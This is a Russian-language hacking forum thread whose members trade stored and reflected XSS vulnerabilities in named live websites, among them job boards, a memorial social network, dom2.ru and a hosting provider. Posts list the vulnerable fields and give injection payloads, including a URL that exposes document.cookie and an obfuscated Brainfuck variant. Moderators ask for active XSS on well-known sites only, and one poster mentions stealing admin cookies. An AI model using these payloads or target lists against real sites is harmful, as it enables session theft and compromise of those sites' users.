procool.ru/brainfuck/ - интерпритатор брейнфака PR-2 Выбираем "Из брейнфака" и вставляем: Code: ++++++++++[>+++>+++++++++++>++++++++++>++++++++++++>++++>++++++>+++++++++<<<<<<<-]>>>>>>.<<<<+++++.>-.<-.>++++++.<--.++++.>>>>++.>+++++++.<<<<+++.>>>>++++.<<<<<--.++.>>>.<<<<++++.>>>>>>+++.-------.++.<<<<-.>>>>++.-.<<<<<<--.>>>>>>--.<<<+.<<<.>>>>>>+.<<<.>>>-.+++.<<<<<--.>>>+++++.<<<--.>>----.<<--.>.<<++.>>>>----.>--.<++++++.<--.>>>--.<<<-.<--.<++.>>++.>>++. и получаем XSS самым извращенным способом!
Социальная сеть мёртвых. pomnipro.ru Уязвимо поле ввода комментариев. (только для залогинённых) И в своём профиле все поля. Ничего не фильтруется. http://pomnipro.ru/memorypage/show/834/ За 2 месяца так и не додумались пофиксить, хотя о баге знают.
За Русского и Эстонского пилота. Часть 2 (Coming Soon) Site: http://www.joblist.tj/ 1. Добавляем Вакансию: http://www.joblist.tj/addvacancy.php 2. Утверждаем Вакансию: http://www.joblist.tj/moderation/ 3. Profit! Уязвимые строки: Code: "Название организации" "Должность" "Требования к кандидату" "Условия труда" "Задачи и обязанности рабочего" "Телефон" "Факс" "Email" "Web" Sploit: Code: "><script>alert(/mix0x0/)</script> Site: http://www.tajtube.tj Поле: Сайт Sploit: Code: "><script>alert(/mix0x0/)</script>
Kolibry CMS Target: Kolibry CMS v.0.3.1 Info: Persistent XSS подвержены поля: “Город”, “Другая информация”, “Подпись”, в разделе “Личные данные”. Info: Persistent XSS в поле “Тема сообщения”, раздела “Личные сообщения”.
dom2.ru Без комментариев. Все знают, что это Яндекс тИЦ (CY) 600 Google PageRank (PR) 6 Любого пользователя можно "поздравить", отправив ему в ЛС открытку (даже без авторизации). Создаются открытки и добавляются в общий каталог также без авторизации. Уязвимо название открытки, которое вводится, после нажатия "сохранить" в редакторе. Пример: dom2.ru/community/users/123/send-gift/83730643 123 - ID пользователя, которому отправляется сообщение. 83730643 - ID открытки.
Эмм молодой_человек/леди... Вы знаете отличия активных ХСС от пассивных ?? Знаете ? А зачем тогда постите ЭТО ? З.Ы. Прошу модеров принять адекватные действия.
spooo.ru http://spooo.ru/users/registration/ Уязвимы поля "Имя:", "Фамилия:" "><script>alert(/XSS/)</script> ТИЦ: 90 Pr: 2
nvhost.ru - хостинг http://nvhost.ru/domains.php Уязвимо поле проверки домена. "><script>alert(/XSS/)</script> ТИЦ: 150 Pr: 4
Абсолютно не вижу смысла. Большинству народу не нужны пассивки, если они не почтовиках. А тому кому нужны - сам найдёт на нужном домене.
SIXSS Code: http://www.playonline.com.ua/game.php?id=1313%29--+%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ой завтыкал... это ж скуля
http://www.jobfair.ru/ Создаем анкету: Уязвимые поля Место рождения Имя Отчество Фамилия Факультет Специализация Пример
http://home-cs.ru/ Регистрируемся , заходим в профиль ->Настройки-> Уязвимые поля: Процессор Клавиатура Мышка Наушники Пример
Недавно нашел в булкиных хаках xss, вот привожу пример. Сайт: mixfight.ru Тиц: 650 Пр: 4 Уязвимый модуль: opinion.php - opinion.php?do=about&userid=1665 Воровать куки админа не захотел. Ну их ... сама xsska http://forum.antichat.ru/showpost.php?p=2953252&postcount=138
Та же бага, только у них идет с фиксом. Сайт: http://domenforum.net Тиц: 250 Пр: 3 Уязвим скрипт opinion.php поле добавления. Фильтр режет теги, но внутри инпута можно работать.
blogspot.com и %username%.blogspot.com - разные домены Если у меня есть сайт с доменом example.com, на который я могу заливать любой JS-код (мой же сайт), это не значит, что я нашел активку в доменной зоне .com.
КАСАЕТСЯ ВСЕМ! ПЕРЕД ТЕМ КАК ПОСТИТЬ, ЕЩЕ 10 РАЗ ПРОЧТИТЕ ПЕРВЫЙ ПОСТ ТУТ ПОСТИМ ТОЛЬКО ACTIVE XSS И ТОЛЬКО НА ИЗВЕСТНЫХ САЙТАХ. //за многакратное нарушение будете заминусованы или прямо в бан =\ задели уже